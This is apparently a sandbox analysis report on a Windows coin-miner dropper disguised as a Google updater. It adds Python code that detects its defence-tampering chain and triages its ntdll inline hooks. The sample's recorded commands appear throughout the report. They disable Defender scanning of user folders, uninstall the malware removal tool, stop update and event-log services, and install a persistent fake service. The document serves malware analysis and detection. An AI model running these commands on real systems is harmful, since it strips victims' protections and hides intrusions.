            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
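The process-creation rows above are the whole defence-tampering chain in one place: update and logging services stopped with sc.exe, a Defender exclusion for the user profile and ProgramData added through Add-MpPreference, the Malicious Software Removal Tool (KB890830) uninstalled with wusa, sleep and hibernate timeouts zeroed with powercfg, and a service named like a Google updater installed with its binary in C:\ProgramData. Any one of these can be an administrator; all of them within seconds of each other from the same parent is not. The detector below is an added example (not part of the Joe Sandbox report) that scores that chain over process-creation telemetry. The event field names are an assumption loosely modelled on Sysmon Event ID 1, the three-family threshold is a judgement call, and the sample events are constructed from the command lines listed above.

```python
"""Flag the defence-tampering chain recorded above from process-creation telemetry.

Added example, not part of the Joe Sandbox report. Field names loosely follow
Sysmon Event ID 1 and are an assumption; the sample events are constructed from
the command lines the report lists.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Services the sample stops: Windows Update (wuauserv, UsoSvc), its remediation
# service (WaaSMedicSvc), BITS, Delivery Optimization (dosvc) and the event log.
TAMPER_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc", "eventlog"}
# An auto-start service whose binary lives here is almost never legitimate.
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# KB890830 is the Malicious Software Removal Tool; automation never uninstalls it.
MSRT_KB = "kb:890830"
RULE_FAMILY_THRESHOLD = 3   # assumption: three independent families = tamper chain


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _quoted_or_bare(prefix: str, text: str):
    """Match `<prefix>"value"` or `<prefix>value` and return value, else None."""
    m = re.search(prefix + r'(?:"([^"]+)"|(\S+))', text)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify(ev: ProcEvent) -> list:
    """Return the tamper rules one event matches; an empty list for anything else."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    cmd = ev.command_line.lower()
    hits = []
    if image == "sc.exe":
        svc = _quoted_or_bare(r"\bstop\s+", cmd)
        if svc in TAMPER_SERVICES:
            hits.append("service_stop:" + svc)
        name = _quoted_or_bare(r"\bcreate\s+", cmd)
        binpath = _quoted_or_bare(r"\bbinpath=\s*", cmd)
        if name and binpath and binpath.startswith(USER_WRITABLE_PREFIXES):
            hits.append("service_create_userwritable:" + name)
    elif image == "powershell.exe" and "add-mppreference" in cmd and (
            "-exclusionpath" in cmd or "-exclusionextension" in cmd):
        hits.append("defender_exclusion")
    elif image == "wusa.exe" and "/uninstall" in cmd and MSRT_KB in cmd:
        hits.append("msrt_uninstall")
    elif image == "powercfg.exe" and re.search(
            r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", cmd):
        hits.append("power_timeout_zero")
    elif image == "dialer.exe" and not ev.parent_image.lower().startswith("c:\\windows\\"):
        # dialer.exe is the injection host in this report; a parent outside
        # C:\Windows has no legitimate reason to start it.
        hits.append("dialer_from_nonsystem_parent")
    return hits


def analyze(events):
    """Aggregate hits: the sample trips six independent rule families, a single
    stopped service trips one, so the verdict keys on distinct families."""
    findings = [(rule, ev) for ev in events for rule in classify(ev)]
    families = Counter(rule.split(":", 1)[0] for rule, _ in findings)
    return {"findings": findings, "families": dict(families),
            "tamper_chain": len(families) >= RULE_FAMILY_THRESHOLD}


_FILE = r"C:\Users\user\Desktop\file.exe"
_SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed from the command lines in the report
    ProcEvent(_FILE, _SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
              r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(_SYS32 + r"\cmd.exe", _SYS32 + r"\wusa.exe", "wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(_FILE, _SYS32 + r"\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    ProcEvent(_FILE, _SYS32 + r"\sc.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    ProcEvent(_FILE, _SYS32 + r"\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    ProcEvent(_FILE, _SYS32 + r"\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    ProcEvent(_FILE, _SYS32 + r"\sc.exe",
              r'C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" '
              r'binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"'),
    ProcEvent(r"C:\ProgramData\Google\Chrome\updater.exe", _SYS32 + r"\dialer.exe", r"C:\Windows\system32\dialer.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", _SYS32 + r"\sc.exe", r"C:\Windows\system32\sc.exe query Spooler"),  # benign control
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for rule, ev in result["findings"]:
        print(f"{rule:50} {ev.command_line}")
    print("tamper chain:", result["tamper_chain"], result["families"])
```

The rules deliberately key on the arguments rather than on the binaries: sc.exe, powercfg.exe and wusa.exe are all routine on a managed host, and stopping bits or UsoSvc alone is a common administrative action. What is not routine is the combination, which is why the verdict counts distinct rule families instead of raw hits.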
            Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wusa.exe | Sections loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll, uxtheme.dll
            Source: C:\Windows\System32\powercfg.exe | Sections loaded: powrprof.dll (three times), umpdc.dll; the same pattern in each of the four powercfg.exe invocations
            Source: C:\Windows\System32\dialer.exe | Section loaded: ntmarta.dll
            Source: C:\ProgramData\Google\Chrome\updater.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wusa.exe | Sections loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll
            Source: C:\Windows\System32\powercfg.exe | Sections loaded: powrprof.dll (three times), umpdc.dll; the same pattern in each of the four powercfg.exe invocations
            Source: C:\Windows\System32\dialer.exe | Sections loaded: ntmarta.dll, iphlpapi.dll, userenv.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, sspicli.dll, powrprof.dll, umpdc.dll, mswsock.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, kernel.appcore.dll, rasadhlp.dll, fwpuclnt.dll, wbemcomn.dll, amsi.dll, profapi.dll, wbemcomn.dll (three further times)
            Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: file.exe | Static file information: File size 5511680 > 1048576
            Source: file.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x52aa00
            Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp
            Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\dialer.exe | Code function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect | 65_2_00000001408460F0
            Source: file.exe | Static PE information: section name: .00cfg
            Source: updater.exe.0.dr | Static PE information: section name: .00cfg
            Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385BAACDD push rcx; retf 003Fh | 31_2_000001F385BAACDE
            Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385BDC6DD push rcx; retf 003Fh | 31_2_000001F385BDC6DE
            Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001F385C0ACDD push rcx; retf 003Fh | 31_2_000001F385C0ACDE
            Source: C:\Windows\System32\lsass.exe | Code function: 34_2_000002A2911DACDD push rcx; retf 003Fh | 34_2_000002A2911DACDE
            Source: C:\Windows\System32\lsass.exe | Code function: 34_2_000002A2919AC6DD push rcx; retf 003Fh | 34_2_000002A2919AC6DE
            Source: C:\Windows\System32\svchost.exe | Code function: 40_2_0000014E255EACDD push rcx; retf 003Fh | 40_2_0000014E255EACDE
            Source: C:\Windows\System32\svchost.exe | Code function: 40_2_0000014E25EEC6DD push rcx; retf 003Fh | 40_2_0000014E25EEC6DE
            Source: C:\Windows\System32\dwm.exe | Code function: 41_2_00000283E0F2ACDD push rcx; retf 003Fh | 41_2_00000283E0F2ACDE
            Source: C:\Windows\System32\dwm.exe | Code function: 41_2_00000283E0F5C6DD push rcx; retf 003Fh | 41_2_00000283E0F5C6DE
            Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret | 64_2_0000000140001403
            Source: C:\Windows\System32\svchost.exe | Code function: 66_2_000001FB539AACDD push rcx; retf 003Fh | 66_2_000001FB539AACDE
            Source: C:\Windows\System32\svchost.exe | Code function: 66_2_000001FB539DC6DD push rcx; retf 003Fh | 66_2_000001FB539DC6DE
            Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001CBD8BBACDD push rcx; retf 003Fh | 67_2_000001CBD8BBACDE
            Source: C:\Windows\System32\svchost.exe | Code function: 67_2_000001CBD8BEC6DD push rcx; retf 003Fh | 67_2_000001CBD8BEC6DE
            Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001F2BD14ACDD push rcx; retf 003Fh | 68_2_000001F2BD14ACDE
            Source: C:\Windows\System32\svchost.exe | Code function: 68_2_000001F2BD17C6DD push rcx; retf 003Fh | 68_2_000001F2BD17C6DE
            Source: C:\Windows\System32\svchost.exe | Code function: 69_2_00000229F8B8ACDD push rcx; retf 003Fh | 69_2_00000229F8B8ACDE
            Source: C:\Windows\System32\svchost.exe | Code function: 69_2_00000229F8BBC6DD push rcx; retf 003Fh | 69_2_00000229F8BBC6DE

            Persistence and Installation Behavior

            Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\lwouyklykeoh.sys
            Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\Google\Chrome\updater.exe (dropped file)
            Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\Temp\lwouyklykeoh.sys (dropped file)
            Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (eight times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (six times)
            Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
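The four hooked ntdll functions in explorer.exe are exactly the ones a shell uses to list files (NtQueryDirectoryFile), processes (NtQuerySystemInformation) and registry keys and values (ZwEnumerateKey, ZwEnumerateValueKey), which is how the miner keeps its dropped files, its dialer.exe hosts and its service key out of view. The recorded "new code" 0xE9 0x9C 0xC3 0x32 0x2C is a 5-byte relative jmp written over the syscall stub's prolog. The block below is an added example (not part of the Joe Sandbox report) that triages such a prolog from a memory snapshot: it decodes the three common trampoline shapes, resolves the jmp target, and checks whether the target still lies inside ntdll. The patched bytes are the ones the report lists; the function address, ntdll base and size are assumptions, since those values change every boot.

```python
"""Triage an inline hook on an x64 ntdll syscall stub from a memory snapshot.

Added example, not part of the Joe Sandbox report. The patched bytes are the
ones the report records for ntdll!ZwEnumerateKey in explorer.exe; the function
address, module base and module size below are assumptions.
"""

# Every x64 ntdll Nt*/Zw* stub starts with: mov r10, rcx ; mov eax, <syscall number>
CLEAN_STUB_PREFIX = bytes.fromhex("4C8BD1B8")
_MASK64 = (1 << 64) - 1


def decode_trampoline(func_addr: int, code: bytes):
    """Return (kind, address) for the common first-instruction trampolines.

    jmp rel32          -> ("jmp_rel32", destination)
    jmp [rip+disp32]   -> ("jmp_indirect", address of the pointer slot; the
                           destination has to be read from that slot)
    mov rax,imm64;jmp rax -> ("mov_rax_jmp", destination)
    Anything else      -> (None, None)
    """
    if len(code) >= 5 and code[0] == 0xE9:
        rel = int.from_bytes(code[1:5], "little", signed=True)
        return "jmp_rel32", (func_addr + 5 + rel) & _MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":
        disp = int.from_bytes(code[2:6], "little", signed=True)
        return "jmp_indirect", (func_addr + 6 + disp) & _MASK64
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov_rax_jmp", int.from_bytes(code[2:10], "little")
    return None, None


def triage_syscall_stub(func_addr: int, code: bytes, module_base: int, module_size: int) -> dict:
    """Classify the first bytes of an ntdll syscall stub.

    A recognised trampoline is a hook. Bytes that are neither a trampoline nor the
    stub template are also flagged, so the caller diffs them against the on-disk
    ntdll instead of trusting them.
    """
    kind, target = decode_trampoline(func_addr, code)
    hooked = kind is not None or not code.startswith(CLEAN_STUB_PREFIX)
    in_module = None if target is None else module_base <= target < module_base + module_size
    return {"hooked": hooked, "kind": kind, "target": target, "target_in_module": in_module}


# Constructed snapshot: bytes from the report, addresses hypothetical.
REPORTED_PATCH = bytes.fromhex("E99CC3322CCF")
NTDLL_BASE, NTDLL_SIZE = 0x7FFC0A000000, 0x1F0000
ZWENUMERATEKEY = 0x7FFC0A0B0C00

if __name__ == "__main__":
    r = triage_syscall_stub(ZWENUMERATEKEY, REPORTED_PATCH, NTDLL_BASE, NTDLL_SIZE)
    print(f"ZwEnumerateKey hooked={r['hooked']} kind={r['kind']} "
          f"target={r['target']:#x} inside_ntdll={r['target_in_module']}")
```

With these assumed addresses the decoded destination is about 740 MB past the end of ntdll, so the jump cannot land in any ntdll code and must go to memory the injector allocated in explorer.exe, which matches the "Writes to foreign memory regions" and "Allocates memory in foreign processes" signatures above. The indirect form is reported as the pointer slot rather than the destination on purpose: resolving it needs a second read, and the slot's own location (inside or outside the module) is already a strong signal.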
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 25_2_00000001400010C0
            Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 63_2_00000001400010C0
            Source: C:\Windows\System32\dialer.exe System information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4955
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4898
            Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 2514
            Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 7484
            Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9666
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7433
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2125
            Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 805
            Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9857
            Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 1735
            Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 782
            Source: C:\ProgramData\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\lwouyklykeoh.sys
            Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_34-14702
            Source: C:\Windows\System32\dwm.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_41-14842
            Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_40-14770
            Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_31-22068
            Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_25-480
            Source: C:\Windows\System32\lsass.exe API coverage: 6.3 %
            Source: C:\Windows\System32\svchost.exe API coverage: 5.3 %
            Source: C:\Windows\System32\dialer.exe API coverage: 0.8 %
            Source: C:\Windows\System32\svchost.exe API coverage: 5.0 %
            Source: C:\Windows\System32\svchost.exe API coverage: 5.2 %
            Source: C:\Windows\System32\svchost.exe API coverage: 5.2 %
            Source: C:\Windows\System32\svchost.exe API coverage: 7.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 4955 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep count: 4898 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\dialer.exe TID: 7292 Thread sleep count: 31 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 4756 Thread sleep count: 2514 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 4756 Thread sleep time: -2514000s >= -30000s
            Source: C:\Windows\System32\winlogon.exe TID: 4756 Thread sleep count: 7484 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 4756 Thread sleep time: -7484000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 7716 Thread sleep count: 9666 > 30
            Source: C:\Windows\System32\lsass.exe TID: 7716 Thread sleep time: -9666000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 7716 Thread sleep count: 270 > 30
            Source: C:\Windows\System32\lsass.exe TID: 7716 Thread sleep time: -270000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668 Thread sleep count: 7433 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668 Thread sleep count: 2125 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep count: 805 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep time: -805000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 7340Thread sleep count: 9857 > 30
            Source: C:\Windows\System32\dwm.exe TID: 7340Thread sleep time: -9857000s >= -30000s
            Source: C:\Windows\System32\dialer.exe TID: 7200Thread sleep count: 1735 > 30
            Source: C:\Windows\System32\dialer.exe TID: 7200Thread sleep time: -173500s >= -30000s
            Source: C:\Windows\System32\dialer.exe TID: 6516Thread sleep count: 782 > 30
            Source: C:\Windows\System32\dialer.exe TID: 6516Thread sleep time: -78200s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep count: 253 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep time: -253000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 3096Thread sleep count: 254 > 30
            Source: C:\Windows\System32\svchost.exe TID: 3096Thread sleep time: -254000s >= -30000s
